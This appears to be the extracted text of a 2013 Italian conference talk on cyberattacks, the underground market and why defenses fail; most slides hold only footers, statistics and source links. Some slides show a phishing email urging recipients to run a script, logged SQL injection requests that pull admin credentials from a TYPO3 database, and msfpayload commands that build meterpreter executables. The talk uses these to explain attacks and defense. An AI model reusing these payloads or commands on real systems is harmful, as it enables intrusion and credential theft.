Possibile che, dopo anni di leaks indiscriminati, conti correnti svuotati e attacchi persistenti di tutte le forme e colori, non sia cambiato nulla?
Possibile che, nonostante le OWASP Top 10 citate fino alla nausea e le grida disperate degli espertoni di sicurezza, certe abitudini rimangano così dure a morire?
Tra verità e leggende, cercheremo di capire cosa realmente conta per il povero attaccante e cosa, purtroppo, offre il mondo di un’information technology perennemente abbagliata dal mito della scatola magica.
Attacchi, bugie e underground digitale by Andrea Pompili
1. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
ATTACCHI, BUGIE E
UNDERGROUND DIGITALE
Speaker: Andrea Pompili
There are only 10 types
of people in the world:
Those who understand binary,
and those who don't
2. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
3. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
«
»
> Bonifica e Hardening fatta a tappeto un anno prima
> Sistemi Operativi Patched all’ultima versione disponibile
> Logging integrale di tutte le attività del Sito
> 2 Sistemi IPS (Intrusion Prevention System) in cascata
4. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
Outside
70%
Inside - Accidental
12%
Inside - Malicious
9%
Inside
5%
Unknown
4%
Source: http://datalossdb.org/ Statistiche 2012
5. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
7,20%
6,20%
6,10%
5,70%
6,80%
6,80%
29,90%
41,20%
27,20%
34,10%
34,10%
30,70%
62,90%
52,60%
66,70%
60,20%
59,10%
62,50%
Attacchi complessivi rilevati dal 2007
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
6. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
76,00%
3,80%
16,80%
3,40%
76,00%
6,50%
13,70%
3,80%
76,40%
6,70%
13,70%
3,20%
Impatto degli Attacchi rilevati
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
7. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
«Non è obiettivo di questo “focus” riportare in dettaglio i
risultati della rilevazione ma analizzando i dati relativi ai valori
medi per l’intero campione si può ritenere che i risultati siano:
• soddisfacenti per la protezione logica;
• molto soddisfacenti per la sicurezza dell’infrastruttura;
• sufficienti per la sicurezza dei servizi;
• da migliorare per la sicurezza dell’organizzazione.
«Possiamo dire che ce l’aspettavamo»
8. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
9. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
10. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
11. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
Aki Mon Telecom
Shane Atkinson
Canter & Siegel
Eddie Davidson
Peter Francis-Macrae
Davis Wolfgang Hawke
Jumpstart Technologies
Vandar Kushnir
Kevin Lipnitz
Wayne Mansfield
Oleg Nikolaenko
Alan Ralsky
Dave Rhodes
Scott Richter
Russian Business Network
iFrame Cash
SBT Telecom Network
Defcon Host
Micronnet Ltd.
InstallsCash
Sendar Argic
Richard Colbert Source: Panda Security «The Cyber-crime Black Market: Uncovered> - 2011
RBNet
12. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-
for-zero-days-an-price-list-for-hackers-secret-software-exploits/
13. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
14. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
(*) According to Frank Rieger
Chief technology officer at GSMK
15. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
Source: Vincenzo Iozzo – OWASP Day 2012
16. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
Source: Vincenzo Iozzo – OWASP Day 2012
17. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
So, how does one get full remote code execution in Chrome? In the case of
Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to
successfully break out of the Chrome sandbox.
(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)
Last year (2011), VUPEN released a video to demonstrate a
successful sandbox escape against Chrome but Google challenged
the validity of that hack, claiming it exploited third-party code,
believed to be the Adobe Flash plugin.
(http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-
sandbox-first-to-fall/10588)
18. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
Blackole Exploit Kit
Cool Exploit Kit
19. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
20. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
21. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
22. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
23. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
Da: hdesk@rcs.it
Inviato: Thursday, November 04, 2004 7:48 PM
A: xxxxxx@rcs.it
Oggetto: Aggiornamento configurazione
Salve,
riceve questa mail in quanto sono stati rilevati dei problemi con il suo account di posta elettronica. La causa di
tali problemi e' riscontrabile in una non corretta configurazione del Suo computer che La preghiamo di
aggiornare collegandosi al seguente indirizzo:
http://xxxx.rcs.it/software/av/index.html
La preghiamo di eseguire lo script, Configurazione.vbe, di autoconfigurazione il cui link e ' disponibile nella
pagina indicata. Al termine della configurazione Le apparira' un messaggio di conferma dell'esito positivo
dell'aggiornamento.
Distinti Saluti
Help Desk - Supporto Tecnico RCS
RCS Editori S.p.A. - Settore Quotidiani
24. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
25. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
26. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
27. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
173.254.216.69 - - [13/Nov/2012:20:03:35 +0100]
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"
178.32.211.140 - - [13/Nov/2012:20:03:43 +0100]
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=
1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,
substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),
floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”
28. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
89.253.105.39 - - [15/Nov/2012:12:32:14 +0100]
"GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=
11502+and(select+1+from(select+count(*),concat_ws(0x3a,
substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),
repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(
rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+"
"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"
Web Shell Extension
29. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
http://evader.stonesoft.com/
http://insecure.org/stf/secnet_ids/secnet_ids.html
30. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
31. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
msfpayload windows/meterpreter/bind_tcp X >
moca_x86_tcp_4444.exe
32. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
msfpayload windows/x64/meterpreter/bind_tcp X >
moca_x64_tcp_4444.exe
33. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
“The truth is, consumer-grade antivirus products can’t
protect against targeted malware created by well-
resourced nation-states with bulging budgets.
They can protect you against run-of-the-mill malware:
banking trojans, keystroke loggers and e-mail worms.
But targeted attacks like these go to great lengths to
avoid antivirus products on purpose”
34. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
<#1> Ragiona come un Attaccante in modo da comprendere
cosa faranno e come ti attaccheranno
<#2> Cerca di capire i loro obiettivi, la capacità che hanno, ma
soprattutto i vincoli operativi che hanno
<#3> Identifica il valore «percepito» di ciò che vuoi
difendere, ma soprattutto cosa vuoi difendere
<#4> Lavora su tutto il perimetro di difesa, senza atti di fede
<#5> Se la tua difesa è più economica dell’attacco,
tu sarai sempre in vantaggio
35. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
36. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
Domande?
Italian
ةَّيَأ ِبلاَطَم
Arabic
¿Preguntas?
Spanish
Questions?
English
tupoQghachmey
Klingon
Sindarin
Japanese
Ερωτήσεις?
Greek
вопросы?
Russian